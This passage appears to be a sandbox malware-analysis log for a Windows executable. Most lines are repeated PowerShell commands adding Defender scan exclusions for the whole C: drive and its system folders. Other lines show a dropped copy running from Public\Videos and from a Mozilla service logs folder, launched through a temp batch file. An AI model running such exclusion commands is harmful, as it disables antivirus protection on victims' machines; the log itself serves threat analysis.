                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'Jump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'Jump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'Jump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'Jump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'Jump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'Jump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'Jump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'Jump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'Jump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'Jump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'Jump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'Jump to behavior
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'Jump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'Jump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'Jump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'Jump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'Jump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'Jump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'Jump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'Jump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'Jump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'Jump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'Jump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'Jump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\zuwFoSPM2u.bat" Jump to behavior
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe "C:\Program Files (x86)\mozilla maintenance service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe"
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeQueries volume information: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
